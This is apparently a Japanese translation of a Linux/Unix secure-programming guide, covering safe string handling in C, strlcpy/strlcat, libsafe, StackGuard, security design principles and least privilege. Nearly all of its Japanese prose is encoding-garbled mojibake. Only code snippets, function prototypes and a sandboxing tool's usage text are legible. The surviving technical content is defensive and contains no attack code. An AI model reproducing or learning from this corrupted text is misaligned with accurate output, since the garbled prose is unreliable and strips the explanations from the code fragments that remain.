͂̍Ō̓_ɂċlq̓dq[󂯎܂B
̓_ Kernighan  Ritchie ̑ [Kernighan 1988A
249 ]ɊmɍڂĂA̓ Linux  FreeBSDASolaris  man
ɂڂĂ܂B strcpy  strncpy ւ̕ύX͐\̒ቺ
ӖAĂ̏ꍇ͂낵ȂʂɂȂ܂B

ӁIB strncpy(s1, s2, n)́As2 ̂镔Rs[ꍇɂg
܂Bł n  strlen(s2) 菬lłB̂悤Ɏgꂽ
Astrncpy()g͊{IɃobt@I[o[t[ɑ΂Ėh䂷dg
Ă܂B܂An  s1 ̃obt@KȂ悤ɁA
ƗɏKv܂B܂Â悤ɎgꍇA strncpy()
 n Rs[ NIL t܂B̂ƂAstrncpy()
gvOSł邩ǂ𔻒f̂ɂĂ܂B

sprintf()gĂobt@I[o[t[͖h܂BA
͒ӂKvłBE߂ԈႢȒPɔƂĂ܂܂B sprinf
̐䕶ɂ͂낢ƕ֗Ȏw@(Ƃ΁u%sv)܂B
Đw肷镔ɂ́AIvVtB[h(Ƃ΁Au%10sv)
w肵Ax(Ƃ΁Au%.10sv)wł肵܂B͎
悤Ɍ܂(Ⴂ̓sIh)A܂قȂ܂BtB[h
Ŏw肷ꍇAŏlw肷邾ł́Aobt@I[o[t[h
̂ɂ͂܂𗧂܂BƂ͑ΏƓIɁAxŎw肷@ł͍
lw肵Aw肵͕ϊwɊÂďo͂܂B
܂Aꂪobt@I[o[t[ĥɖ𗧂܂B
AxŎw肷@Ŝ̍ő咷wł邱ƂYȂł
B̕ϊwł͂܂ႤӖɂȂ܂BɁu*vw肷
Aő咷p^œnƂł܂(Ƃ sizeof()̌ʂ)B
ȒPɎ܂̂ŁAł sprintf()gobt@I[o[t[
hƗǂĂ܂B

 char buf[BUFFER_SIZE];                                                
 sprintf(buf, "%*s",  sizeof(buf)-1, "long-string");  /* WRONG */      
 sprintf(buf, "%.*s", sizeof(buf)-1, "long-string");  /* RIGHT */      

 sprintf()͂ƂĂ֗łB͕GȃtH[}bgwł
łBAsprintf()ŊԈႢƂ̂ȒPłBtH[}bgG
ȂAKϊ̑傫ׂĂɂčő̑傫ƂtH[}bg
ɂĂBAxw肷镔 1 ̃p^̑傫
wł܂Bo͂Gȏꍇ́Aulő́vl
͍̂łBlő咷̑gݍ킹ɑ΂āAvO\
󂫂mۂĂȂ΁Aobt@I[o[t[̐Ǝコcꂽ܂
ɂȂĂł傤B܂Asprintf()͏SɏIɁANUL 
ϊɉ܂Bŉ͖̕Y₷Aꂪu1 oCgԈ
(off-by-one)vG[NɂȂ܂B̂悤ɓ삷ƁA
󋵂ɂĂ͒ɂڂɂƂɂȂ邩܂B

܂AL̃R[hŋCɂĂė~̂́Asizeof()Ƃz
̑傫ɂȂ_łBubufvmۂ̃|C^ɂȂ悤ɃR
[hύXƁAusizeof()vׂ̏ĂCȂ΂Ȃ܂(
ȂƁAsizeof ̓|C^̑傫vĂ܂A͂Ă̒l
Ƃď\ȗ̈Ƃ͂܂)B

 

5.2.2. ÓI͓IɊmۂobt@

strncpy ̂悤Ȋ֐́AÓIɊmۂobt@̂ɕ֗łBob
t@́ugɂȂ\ȑ傫vŊmۂĂAmۂ炸
傫̂܂܁AƂjŃvOĂ܂B 1 ̕@
́AKvȑ傫̃obt@𓮓IɊmۂ@łBǂ̕@ZL
eBɖڂȊ֘A܂B

Œ蒷̃obt@gꍇɁAʂZLeB̖肪܂B
͌Œ蒷̃obt@͂₷AƂłB strncpy(3)
 strncat(3)Asnprintf(3)Astrlcpy(3)Astrlcat(3)Ă
BU҂͂ɂݒ肷AƂ̂{IȍlłB
̌ʂ̕񂪐؂̂ĂƁAŏIIɂ͍U҂]񂾏Ԃɂ
܂ (J҂Ӑ}ʂł͂Ȃ)BЂƂƁA񂪂
̏ȕ\Ăꍇ܂BU҂́Aŏ̕Ƀo
bt@𖄂߂̒āA̕܂Ƃ߂Ƃ
ɂ邩܂BŁA̗Ă݂܂B

 E gethostbyname(3)ĂяoR[hvׂĂBɕ
    A hostent->h_name Œ蒷̃obt@ strncpy  snprintf 
    Rs[ĂB strncpy  snprintf gĂ̂ŁAɒ[ɒ
    SChC(FQDN) ĂI[o[t[h܂B
    ĂŏIƎvł傤Bł FQDN ̖
    ؂̂ĂĂ܂ʂɂȂ肩˂܂B͔ɂ܂ƂŁA
    ɉ邩ŏ󋵂ςĂ܂܂B
   
 E strncpy  strncatAsnprintf gꍇvׂĂBt
    @CVXe̎̂\tpXobt@ɃRs[܂
    BɌ̒lMłȂ[Û̂ŁÃRs[vZ
    ʂ֐ɓn̈ꕔƍlĂ݂ĂBňS
    ̂ł傤BŁAU҂pX̐擪ɑʂ́u/v𖄂ߍނ
    zĂ݂ĂB́u/vƂt@Cɑ΂鑀ɂȂ
    Ă܂܂BvOʂ͈SƐMĒlǉȂA
    ̃vO͂Ă܂܂B́AU҂̓ob
    t@̒ɋ߂t@CloāAt@Cǉ邱
    ƂŁAɉ󂵂Ă܂܂(́AIɂĂ
    ܂܂)B
   
 

ÓIɊmۂobt@gɂ́AƂȂĂ錳ɂȂ̈Ɠn
̗̈̒悭lȂ΂܂BāA͂⏈ɏo
Ԃ̌ʂӐ[`FbNĂB

̑ÍAŒ蒷̃obt@g킸ɁA񂷂ׂĂ𓮓IɊm
ۂ@łB̕@ GNU ̃vO~OEKChCŐ
āAvOłǂȑ傫̓͂悤ɂȂ܂(z
Ȃ)BIɕmۂۂɋŃAmۂz
ē삳Ă܂_ɂ̂́A܂ł܂B́Aobt
@I[o[t[N̂ł͂ȂAƋCɂĂ镔ł͂ȂAv
Ôǂ̏Ŏg؂Ă܂܂Bł̓
ǂɂmۂł܂B܂AIȊmۂ̓ǂpłȂ
ꂪ܂̂ŁA_Iɂ̃vÔɏ\ȉz
ƂĂAI[o[ē삵Ă܂\͏\
܂BɁAvO̓I[o[Ă܂OɁA炭
ʂ̉zg܂BȂƂĂuXbVOvɊׂ
BXbVONƁARs[^̓fBXNƃԂł̏
󂯓nɂׂĂ̎Ԃ₵Ă܂܂(YIȏ邩)
B̓T[rXۍUƓe^܂B͂̑傫ɑ΂ė
Ȃ݂ƌʂ܂BʃvOœIɕm
ۂȂAgʂĂtFCEZ[tɂȂ悤ɐ݌v
΂Ȃ܂B

 

5.2.3. strlcpy  strlcat

̕@́AOpenBSD ō̗pĂ strlcpy(3)  strlcat(3)łB
 Miller  de Raadt[Miller 1999]쐬܂B͋@\
ŏɗ}AÓIȑ傫obt@̗pĂ܂BC ̕
Rs[AÂɈقȂC^tF[X̗pĂ܂(G[N
ɂ)B̊֐̃\[XƃhLǵA ftp://ftp.openbsd.org
/pub/OpenBSD/src/lib/libc/string/strlcpy.3 ŗpłAV BSD X^
C̃I[v\[XCZX̗pĂ܂B

܂vg^Cv܂B

size_t strlcpy (char *dst, const char *src, size_t size);           
size_t strlcat (char *dst, const char *src, size_t size);           

strlcpy  strlcat p^ŃRs[̃obt@ۂ̑傫Ŏw
܂(Rs[镶̍őlł͂܂)B܂Aʂ NIL ŏI[
邱Ƃۏ؂Ă܂(傫 0 傫)BYĂȂȂ
́A傫ɂ NIL p 1 oCgĂKv邱ƂłB

strlcpy ́ANUL ŏI[̕񂩂A size - 1 ̕Rs[
ANIL ŏI[܂B strlcat ́ANIL ŏI[Ă镶𖖔ɒǉ
܂BςĂ size - strlen(dst) - 1 oCgǉANIL 
I[܂B

strlcpy(3)  strlcat(3)́AĂ Unix CNȃVXeɃftH
gł̓CXg[܂Bꂪ_ƌΌ_łB OpenBSD ł
A<string.h> ̈ꕔɂȂĂ܂B͂ł͂܂B
͏Ȋ֐ŁAvÕ\[X̒ɓꂽ(ȂƂIv
VƂ)AƗpbP[WƂēǂݍ߂܂BP[X
 autoconf gĎ̂\łBɑ̃vOł
̊֐g΁ALinux fBXgr[V⑼ Unix CNȃV
Xe̕W\̈ꕔƂȂ̂͂Ȃł傤B܂ŋ߂ɂȂ
āÅ֐́uglibvCuɎ荞܂܂(pb`
Ă̂悤ɂȂ܂)BāAŋ߂̃o[W glib g
pł܂B glib ł͂̊֐ g_strlcpy  g_strlcat ƂȂ
(strlcpy  strlcat ł͂܂)Aglib Cu̖Kɉ
`ɂȂĂ܂B

܂ strlcat(3) ́A 0  NIL ̕(w肵
̒)ɂȂꍇɎ኱@ςĂ܂B OpenBSD ł́A
 0 ȂΏ̒̕ 0 Ƃ݂Ȃ܂B܂ 0 ȊO
NIL ̕()ɖꍇ́A͎̒w肵
̂ƓƂ݂Ȃ܂BKɂāAւ NIL ̑gݍ
OꂵĂ܂BɂAȂƂ Solaris (_ł)̋K
Ă܂BŔAIWĩhLgɂLq
łB Todd Miller ƘbAOpenBSD ̕@ƍӂ
 (Solaris ȂƂɂ)BR͒PłBǂȏł
ĂAstrlcat  strlcpy ͏悪w肵̑傫zĂ邩
ǂ𒲂ׂǂ̂ɂ炸AĂȂłB
悤ȕ@ƂƁAcore _vĂ܂(͈͊OɃANZX
)An[hEFAɈe^邩܂(}bvh I/O 
ʂ)B܂肱łB

  a = strlcat ("Y", "123", 0);                                      

Ԃl 3(0+3=3)łASolaris  4 ɂȂ܂B͏
u傫v̒z𐳂ĂȂ߂łBA
 0 ͏ NIL ꍇ悤ɂE߂܂
B glib ̏̃o[Wł́Ȃ_BāA OpenBSD ̕
@p\łB

 

5.2.4. libmib

C p̃c[Zbgɂ́AIɕ𓮓ImۂĂ̂
B Forrest J. Cavalier III ́ulibmib allocated string
functionsvŁAhttp://www.mibsoftware.com/libmib/astring ł
Blibmib  2 ނAulibmib-openv X11 ƎƎ̃CZX
ɂĂ܂̂ŁA炩ɃI[v\[XłB̃CZX́A
CĔzzF߂Ă܂AĔzzɂ͕ʂ̖OIȂ΂
񂵁AuSɃeXgĂȂvƊJ҂͋LڂĂ܂B
libmib-mature ɓȂA\݂ɔp܂Bh
Lg̓I[v\[Xł͂܂񂪁ARɗpł܂B

 

5.2.5. C++ std::string NX

C++ ŊJĺAɑgݍ܂Ă std::string NX𗘗p
ł܂B̃NX͓Iȕ@̗pĂāAKvɉċL̈
₵Ă܂BӂȂƂȂ̂́ANX̃f[^u
char *vɒu (Ƃ data()  c_str()g)AĂ
obt@I[o[t[̖肪\ʉ_łBāA\bh
gpꍇɂ͒ӂKvɂȂ܂B c_str()͏ NIL ŏI[
Ԃ܂Adata()̏ꍇ͂ǂȂ邩킩܂(łA
Ƃǂ NIL ŏI[܂)B data()̎gp邩AǂĂg
΂ȂȂȂÃtH[}bg𓖂ĂɂȂłB

̕񃉃CugĂJ҂lɂ񂢂܂Â
ȃCúȂ̃Cu⎩̕񃉃CuƑgݍ
킹ɂȂĂ܂B̂悤ȃCugꍇɂ́AƂ킯ӂ
ĂB̕NX̑́AIɃNXuchar *v^
CvɕϊĂ܂[`Ă܂B̌ʁAmȂɃo
bt@I[o[t[̐Ǝコɂ͂܂Ă\܂B

 

5.2.6. Libsafe

(Lucent Technologies )Arash Baratloo  Timothy TsaiANavjot
Singh ALibsafe J܂B̃CúAX^bNjU
ɎアƂŒmĂ郉Cu֐̂Ƀbp킹܂B
̃bp(J҂́Au~hEFAv̈ƌĂł܂)́AIɃ
[hPȂ郉CuŁAstrcpy(3)̂悤 C ̃Cu֐C
o[WĂ܂B̏Cς݂̃o[ẂAIWi
̋@\Ă܂AӖłǂȃobt@I[o[t[
݂̃X^bNEt[̒ɕ߂܂B̐\͂ł́ACu
̃I[owbh͂ƂĂƂĂ܂B Libsafe ̃hLgƃ\
[XR[h http://www.bell-labs.com/org/11356/libsafe.html 擾
܂B Libsafe ̃\[XR[h̓I[v\[X LGPL CZXɊS
ɏĂāALinux fBXgr[^͗pɊ֐S܂
B

Libsafe ̉i͖͑ɗ悤Ɏv܂Bm Linux fBXg
r[^ Libsafe ̗̍pǂẢ@͂̑̐l
lɌɉ܂BƂ΁ALinux fBXgr[V
Mandrake(o[W 7.1) ͍̗pĂ܂B\tgEFAJ҂ɂƂĂ
Libsafe ͎̍񂾖ĥɕ֗Ȏdg݂łA{Ƀobt@I
[o[t[h킯ł͂܂BR[hJĂ鎞ɁA
Libsafe ɗׂł͂ȂR܂B

 E Libsafe ́A炩Ƀobt@I[o[t[̖ĂAm
    ̂킸Ȋ֐h䂵܂BĂ鎞_ł́Ahł
    ֐̃XǵÃhLgŖĂƂ֐̃
    Xg肩ȂZȂĂ܂B܂AȂg(Ƃ
    while [v)obt@I[o[t[NR[h͖h䂵Ă
    B
   
 E libsafe fBXgr[VɓĂƂĂACXg[
    @ɂėpɍo܂BhLgł LD_PRELOAD 
    肵 libsafe ̖hLɂ悤ɐĂ܂A̓[
    Ůϐ̐ݒ͂Ƃɂ܂BŃ[U
    svOɑ΂h͖ɂȂĂ܂܂B
   
 E Libsafe ́A^[AhXX^bNɂobt@I[o[t
    [ɑ΂Ăʂ܂Bq[vvVW[Et[ɂ
    ̑̕ϐł́A炸I[o[Ă܂܂By󒐁Fv
    VW[Et[Ƃ́Ao^ς݃WX^ƃ[JϐĂ
    X^bNEZOgłBactivation record Ƃ܂z
   
 E ɂRs[^EVXeׂĂ libsafe(͎
    )płƒfłȂÃvO libsafe 
    Ŗh䂵Ȃ΂܂B
   
 E LibSafe ͓o^ς݂̃t[E|C^X^bNEt[ꂼ
    ̐擪ɂ邱Ƃ肵Ă悤Ɍ܂B͏ɐ^Ƃ͌
    ܂BRpC(gcc ̂悤)͍œKĂ܂܂BɁu
    -fomit-frame-pointervƂIvV libsafe ɕKvƎv
    폜Ă܂܂B܂Alibsafe ܂ȂvO
    邩Ȃ̂łB 
   
libsafe ̊J҂gA\tgEFAJ҂ libsafe ɗ
ĂĂ͂ȂƂmĂ܂Bނɂ΁A

   
    obt@I[o[t[Uɑ΂œḰAvǑׂ̏C
    ł邱Ƃ͎m̎łBAׂvOC
    ɂ́AvOɌׂ邱ƂmKv܂B libsafe 
    ̑̃ZLeB΍gp{̃bǵA܂Ǝコm
    ĂȂvOA̍UɔƂ_ɂ܂B
   
 

5.2.7. ̑̃Cu

glib(glibc ł͂Ȃ)Cu͍LpłI[v\[X̃Cu
 C vO}ɑ΂Ă֗̕Ȋ֐񋟂Ă܂BƂ
AGTK+  GNOME ͗҂Ƃ glib gĂ܂BȑOɂwE܂
Aglib o[W 1.3.2 ɂ͎񋟂pb` g_strlcpy() 
g_strlcat()ɓKpĂ܂B̃o[WLp΁AڐA
̍̊֐̗pƊȒPɂȂ͂łBł́Aglib 
Ců֐obt@I[o[t[hۂ͂͌̕_Â
܂BAglib ֐͎̑IɃmۂAs
肵āA킩炸ɓȂȂ܂(Ƃ΁Aɕʂ̂Ƃ
Ƃ邽߂)BʓIɁAglib ֐̑啔́AS߂vO
ł͗płȂꍇ܂B GNOME ̃KChCł
g_strdup_printf()̂悤Ȋ֐̎gp𐄏Ă܂BvO
ONꍇAɃNbVĂ܂ȂȂAgpĂ
܂܂Bꂪ󂯓ȂÂ悤ȃ[`gp
̂́AK؂ł͂܂B

 

5.3. C  C++ ł̃RpCɂ

܂ϓ_͂낤Ƃ̂ɁÄ̋E`FbN
RpCɍŝ܂([Sitaker 1999] ̃XgQƂĂ
)BłA낢Ȗhi 1 ƂĎgpȂÂ
ȃc[͔ɗLłBA̎@Ŗh䂷̂͌i
Ƃ͂܂BRƂďȂƂ 2 ͋܂B܂Â悤
ȃc[̓obt@I[o[t[ɑ΂ĕKvȖḧꕔs܂
(āuȁvhsƂƁAʏ 12  30 {xȂ
)BC  C++ ͂obt@I[o[t[hi킹
܂BɁAI[v\[XłvO͂ǂȃc[găR
pC邩߂Ă킯ł͂Ȃ_łBVXeɂĂ
ftHǵuʂ́vRpCgƁAZLeB̎_炷
܂B

ɗLȃc[ 1 ɁuStackGuardv܂B́AWI
GNU C RpC̏CłłB StackGuard ́uK[hv邽߂̒l(uJ
iA(canary)vƌĂт܂)^[AhXĂOɑ}
삵܂Bobt@I[o[t[ă^[AhX
ƁAJiA̒l(炭)ύXAۂɎgpOɃVXe
o܂B͔ɗLȂ̂łA^[AhXȊO̒l(
pĂVXeUł܂)obt@I[o[t[ɂ
Ώł܂B StackGuard āAJiA𑼂̃f[^ɑ΂Ă
g悤ɂ̂AuPointGuardvłB PointGuard ͎Iɂ
l(ƂΊ֐̃|C^⃍OWvEobt@) ی삵܂B
̕ϐ PointGuard gĕی삷ꍇAvO}݂̉Kv
Ȃ܂(vO}͂ǂ̃f[^JiAŕی삵Ȃ΂Ȃ̂
fȂ΂܂)B͗LȔʁA{ی삷ׂȂ̂ɕKv
ȂAƂ蔻fĂ܂AƂȒPɕیȂĂ܂ꍇl
܂B StackGuard  PointGuardA܂ƓlȂ̂ɂĂ̏
ׂ Cowan [1999] QƂĂBy󒐁Fނ̃JiÁAYz
_Yf̑_Ԃumv邽߂ɎĂ܂z

Ɗ֘AāALinux ̃J[lCAX^bNEZOgł̃v
O̎s֎~Ă܂@܂Bsɂ̓pb`K
vł (Solar Designer ̃pb`Ɋ܂܂Ă܂B http://
www.openwall.com/linux/ Ă)B̃hLgĂ鎞
_ł́A܂J[lɎ荞܂Ă܂BZpIȗR 1 ɁAv
قǂ̌ʂłȂ_܂BU҂́AΏۂɂĂvO
Ɋɑ݂Ă鑼́uʔȁvꏊ (Cuq[v̈A
X^eBbNȃf[^EZOg̈擙)ĂяoĂ܂łB܂
Linux ̓X^bN̈ŃvOsꍇ܂BƂāAV
Oi GCC ́ug|v̎ꍇłB Solar Designer 
̃pb`ł̂悤ȃP[XɂΉł܂Aꂪpb`𕡎GȂ
Ă錴łBlIɂ Linux {ɑgݍ܂Ă悢Ǝv܂
BƂ̂ɂĂԂ񂩂łUȂ܂A̍U
̂镔͖hł邩łB Linus Torvalds l
悤ɁÃpb`ڂقǂ܂܂Ȗh䂪łȂArIȒP
ɂ̖h̗ƂłAƂ_ɂĂ͎ӌłB
Linus Torvalds ̃pb`̗pȂRɂẮA http://
lwn.net/980806/a/linus-noexec.html ĂBy󒐁Fg|
(trampoline)Ƃ́AvOsĂŒɃvOgɂ
A݂ɓƗȃIuWFNgER[hw܂z

vɁA܂vÔ̂Ńobt@I[o[t[h悤ɊJ
̂؂łB̂悤ɊJɁAStackGuard ̂悤ȃc[
eNjbNgāAɈSuĂׂłB\[XR[h
obt@I[o[t[ǂo邾ǂoA StackGuard ͂
Ɍʂ𔭊܂BƂ̂ StackGuard ĥ߂ɌĂ΂悤
uvIȎ_v炷Ƃł邩łB

 

5.4. ̑̌

obt@I[o[t[́APerl  PythonAJavaAAda95 ̂悤ȑ̃v
O~OłȂɂȂ܂B܂ƂAgĂ鑼
̃vO~O(AZu͏)̂قƂǂׂẮAobt@
I[o[t[h䂵Ă܂B C  C++ ȊǑgƂĂA
񂷂ׂĂ̖ł킯ł͂܂Bڂ́A_
Section 7.3 ɂ NIL ̈QƂĂB܂ꂪ񋟂
Ă{Iȋ@\(Ƃ΃^CECu)płŁA
̋@\Sł邱Ƃۏ؂ƂcĂ܂B̂
Ȗ͂ɂAS߂vOJsꍇ́A
̌̎gp^ɍlāAobt@I[o[t[hłB

 

Chapter 6. vÕC^tF[XƓ\Ƃ邱

                                    Nďǂ̖łтB̗ 
                                    𐧂ȂlB                   
                                                                       
                                               񐹏⼌ 25  28 
 

6.1. SȃvO邽߂ɂ́A\tgEFAEGWjAǑ
ɏ]

Saltzer [1974]  Saltzer and Schroeder [1975]ł́A݌vɓĈS
ی삷̂ɁAL̂悤Ȍ܂Ƃ߂Ă܂B͍ȂLvł
B

 E ł邾ȂB[UvOɂ͂ł邾
    Ȃ悤ɂĂB΁AANVfgG[AU
    ҂ɂ_[Wŏɗ}܂B܂A邱Ƃœ
    vOԑ݂̉e\Ȍ}̂ŁAӐ}
    svŕsK؂ȓ𗘗pȂȂ܂B̃ACfBA̓vO
    ɂ̗pł܂BvO̍ŏ̕ɂKvƂȂ
    ĂB̏ڍׂ́ASection 6.4 ĂB
   
 E dg݂PɁBhVXe͏Pɐ݌v܂Bނɂ
    ΁Au\tgEFAsɒAn[hEFA𒲍āA
    h@\̎eNjbNKvɂȂ肵܂BeNjbN
    ܂ɂ́APȐ݌v{ɂȂ܂vu
    KISSv̌(ukeep it simple, stupidv(AZƂ))ƕ\
    ꍇ܂B
   
 E I[vȐ݌vBh䂷dǵ݂AU҂̎dg݂̒m
    ȂƂɗĂ͂܂B̂AJꂽdg݂ŁApX
    [h閧̂悤ɔrIȂ (ĊȒPɕς)Ŕ
    悤ɂĂBI[vȐ݌v́AL͈͂ȌJꂽ
    \ŁA邱ƂŃ[ŨVXe̗pK؂Ȃ̂
    [ł܂BɌāALzzVXe𖧂Ƀ
    eiX悤Ƃ̂́AIł͂܂BfRpC(tR
    pC)n[hEFA󂵂Ă܂ƂŁAƌԂɂu
    閧v΂Ă܂\܂B Bruce Schneier ́A̐
    GWjAȂ΁AuZLeBɊւ邷ׂẴR[h́AI[
    v\[XłǂƎ咣vƂĂ܂B܂
    ALO҂烌r[󂯂AŖƂȂC
    邱ƂؖĂ܂[Schneier 1999]B
   
 E Sɒs. ׂẴANZX`FbNȂ΂܂
    B`FbNdǵ݂A󂳂ȂꏊɒuĂBƂ
    ANCAgET[ofł΁AT[ołׂẴANZX
    `FbNKv܂B̓[UNCAgV
    Â̂Cł邩łB́AChapter 4
     Section 6.2 ɂY܂B
   
 E tFCEZ[tftHgƂ(Ƃ΁Ap[~bVp
    @)BftHgł̓T[rXۂĂBh@\͂ǂ̃A
    NZXĂ̂A󋵂FĂȂ΂܂Bڂ
    ́ASection 6.7  Section 6.9 ĂB
   
 E WȂBΏۂւ̃ANZXɓāȀ
    ̂zIłB΁AhVXejĂA
    ȃANZX悤ɂ͂ȂȂłB
   
 E ʂdg݂͂ł邾pȂ. ʂdg݂̐Ƃ̗px
    ŏɂĂ(Ƃ΁A/tmp  /var/tmp ̗p)Bdg
    ʉƁA̗̒Ŋ댯ȌoHɂȂĂ܂
    A\Ȃݍp肷鋰ꂪ܂Bڂ́A 
    Section 6.10 ĂB
   
 E CŎ󂯓邩AȒPɎg邩Bq[}EC^tF[
    X́A[U퉽CȂh̎dg݂g悤ɁAg
    ݌vȂ΂܂BZLeB̎dg݂[Uv`
    h̖ڕWƃ}b`ȂA߂͌ł傤B
   
 

ZLeBɂĂ̐݌v̌낢ƖԗĂ鎑 Peter
Neumann's CHATS Principles <http://www.csl.sri.com/neumann/chats2.html>
ɂ܂B 

 

6.2. C^tF[XS

C^tF[X́Ał菬(ȂVv)(Kv
@\)AėOȂ̃C^tF[Xg悤ɂKv
BMpł͂͂قƂǂȂƎvĂB[Uf[
^ɐ邱ƂĂB

 

6.3. f[^Ɛ؂藣

T|[gǂȃt@Cɑ΂ĂA(O痈)f[^Ƃs
vOSɕĐ݌vĂBAvP[Vf[^
r[A[́AOō쐬t@C\ꍇɂ悭g
ŁA炪t@CvO(uXNvgvƂu}Nvƌ
܂)ƂĎ󂯕tȂ悤ɂĂBł댯Ȃ̂́As}
NłB́AAvP[V[hAf[^ŏɕ\
肵ɓ삵Ă܂܂BZLeB̊ϓ_炷ƁA͍
N̂҂Ă悤Ȃ̂łB

ꂽƂ납_E[h@\vOłƃT|[g
΂ȂȂ(Ƃ΁ÃVXeɎ邽)A}N̓
ɕKȂ΂܂(uTh{bNXvƌ
ł܂)BoATh{bNX{ɐ͍̂łB
ہAPƂōL͂ɗpꂽTh{bNX̒ŁAĎOɓnĔj
̂͋Lɂ܂(AJava ܂߂)B\ȂAȂ
ƂvOƗt@CɎ߂ĂB΁ÃT
h{bNXɌ_肻ꂪCȂĂAȒPɃubNł
łB܂ƗɂĂƂŁAR[h̍ėpeՂɂȂA𗧂
ɐg߂ŗpł܂B

 

6.4. ŏ

ȑOɂ悤ɁAʓIȌ́AvOɂ͏ɕKvƂȂ
Œɂ^ȂƂł(ł邾Ȃ)B
΂̃vOĂA_[W͍L܂Błɒ[ȗ́AP
ɈSKvƂȂvO܂ȂƂłBł΁A
ׂłBƂ΁A\ȂvO setuid  setgid 
ȂłB̈ʃvOɂāAǗ҂ɂ͓OɃO
Ƃ悤Ɉ˗ĂB

Linux  Unix ɂāA܂vZX̓肷̂́ÃvZX
id ̑gݍ킹łBvZXꂼɂ́A[UO[v҂̎A
Aۑ id ܂B (Â Unix ɂ́uۑvid Ȃ̂
)B Linux ɂ͓ʂȊg@\ƂāAt@CVXeƂ͓Ɨ uid
 gid AvZXꂼɗpӂĂ܂B̒l𑀍삷̂
Aŏɗ}ŌƂł܂񂵁Aŏɗ}
@܂(LŘ_܂)B chroot(2)płAvO
猩t@Cŏɂł܂B Linux  Unix ɂ́Aɂ
߂l܂BƂ΁A POSIX PCpreB(Linux
2.2 ȏŃT|[gA Unix CNȃVXełT|[gĂ
̂܂)ɓ܂B

 

6.4.1. ŏ

łʓIȂ́Aō̓fɍŏɂ
@łBɁAł邾 root ̓͔̂ĂB
̂킸ȃt@CQɃANZXKv邾ŁAvO 
setuid root ȂłB@\ɓƗ[UO[vAJ
Eg̍쐬ĂB

悭s@́AʂȃO[v쐬At@C̃O[ṽI[i[
̃O[vɕύX@܂BăvÕO[v 
setgid ܂BłȂ setuid  setgid łB
ĂāAO[ṽo[ɂ͂قƂǌF߂Ȃ悤ɂ܂
(Ƀt@C̃p[~bVύX錠F߂Ȃ)B

́AQ[\tg̃nCXRAL^ꍇɂ悭gĂ@
BQ[͕ games  setgid āAXRAt@C games O[v
LĂ܂BăvÔݒt@ĆAʂ̃[U(root
)LĂ̂ʂłBĂ΁AQ[ʂĐN҂
ĂĂAnCXRA邱Ƃ͂łƂĂAQ[̎s`
ݒt@Cɂ͎t܂B҂͏dłBU҂Q[̎
s`ݒt@C(ǂ̎s`𓮂𐧌䂵Ă)ύXł
ȂAQ[𓮂Ă郆[URg[ł邩Ȃ
B

VO[v邾ł͕s\ȏꍇ́AṼ[U(ۂɓ
Ȗ)쐬A֘A郊\[XǗĂB̓T^I
ȗ Web T[ołBWeb T[o͓ʂȃ[U(unobodyv)Őݒ肵Ă
̂ŁÃ[UƗĂ܂BہAWeb T[o͋
邱Ƃ܂BWeb T[o͕ʂ͋N root ̓Kv
܂(80 ԃ|[g𗘗p邩ł)ANĂ܂ƂׂĂ̓
OāAunobodyvƂ[Uœ܂BJԂ܂Aʏ퉼̃[
U͍ŏɓvOLĂȂ̂ŁAAJEgɐ荞
AvÔύXł܂BʓIɂ́A삵Ă Web T[o
ɐNĂAꂾŃVXeׂẴZLeB͐N܂B

f[^x[XVXe𗘗pĂȂ(܂ÃNGEC^tF[
XĂяoĂ)ÃAvP[V𗘗pĂf[^x[XE
[ǓɁAĂBƂ΁A[U`ق̂
̃NGgANZXKvȃ[Uɑ΂āAVXẽX
gAhEvVWׂĂɃANZX悤ȂƂ͂ȂłB
sł̂́AXgAhEvVWłBĂ΁AƂN
Cӂ̕NGɖꍞ񂾂ƂĂA_[W͌
͈͂Ŏ܂܂BڕWI SQL NGNCAg̃f[^Ƃ
񋟂Ȃ΂ȂȂȂA̓𐧌悤ɃbpĂ
(Ƃ΁Asp_sqlexec ̂悤)B (f[^x[XɂẴAhoCX
ĂꂽASPI Labs Ɋӂ܂)B 

vO root mۂĂȂ΂ȂȂȂAPOSIX
PCpreB̗p𑁋}ɌĂBāAvOp
łŏɉ悤ɂĂB POSIX PCpreB́A
Linux 2.2 ⑼ Unix CNȃVXȇŗpł܂BNシ
 cap_set_proc(3) Linux ŗL capsetp(3)[`Ăяo΁A
͂Ƃ̃vŐ@\܂܂ɂāA{ɃvOK
vƂĂ@\ɉ܂BƂ΁Albg[Nf[
(ntpd)́AȑO root ŎsĂ܂B́A݂̎킹
邽߂łBAntpd  CAP_SYS_TIME Ƃ 1 ̃PCpreB
œpb`J܂Bpb`𓖂Ă΁AU҂ ntpd 
ĂÃvOɂނ̂ȑOȂ܂B

uxāvƌĂ̂ɂ́AR܂B͑
ip POSIX PCpreBgēێƁAvZX
root [U id g邩łBdvȃt@C(ݒt@Co
Ci) root LĂP[X̂ŁAU҂̓PCpreB
ŐĂĂAˑRƂăvORg[ł܂B
܂AVXěƂȂt@CCłAroot xׂ̓Ď
łĂ܂܂B Linux J[l̊g(2.4.X  2.2.19+ ̃o[W
ŗpł܂)́Ap\ȓɐ̂ɁAƗDꂽ@
񋟂Ă܂BvO rootŋN(POSIX PCpreBg)
A{ɕKvȃPCpreBɂ܂ōi肱ŁAprctl(PR_SET_KEEPCAPS,1)
Ăяo܂BāAsetuid() g root ȊÕvZXɕύX
B PR_SET_KEEPCAPS ̓vZXɃ}[NAvZX setuid  0
ȊO̒lɂɁAPCpreB̓NA܂(ʏ̓NA
)B̃vZX̐ݒ́Aexec() ƃNA܂BA
PR_SET_KEEPCAPS  Linux L̊g@\ŁAŋ߂̃o[W Linux J
[lō̗pĂ_ɒӂĂB

Linux L̃c[ 1  SuSE JuRp[ggv
Bg΁AȒPɍŏɂł܂B̃c[́A
t@CVXẽ[g uidAgidA̓PCpreBݒ肵Ă
vO𓮂܂B̃vOC邱ƂȂɁAɎy
Ɏsł܂BLo[W 0.5 ̏łB

Syntax: compartment [options] /full/path/to/program                 
                                                                    
Options:                                                            
  --chroot path   chroot to path                                    
  --user user     change UID to this user                           
  --group group   change GID to this group                          
  --init program  execute this program before doing anything        
  --cap capset    set capset name. You can specify several          
  --verbose       be verbose                                        
  --quiet         do no logging (to syslog)                         

 

܂艺L̂悤ɂ΁AS anonymous ftp T[o^pł܂
B

  compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd 

 

̃hLgĂ鎞_ł́A܂ŁA\I Linux fB
Xgr[Vł͗pł܂B󋵂͂ɕςł傤
B̃vÓA http://www.suse.de/~marc 炩_E[hł
܂B

ׂĂ Unix CNȃVXe POSIX PCpreBĂ킯
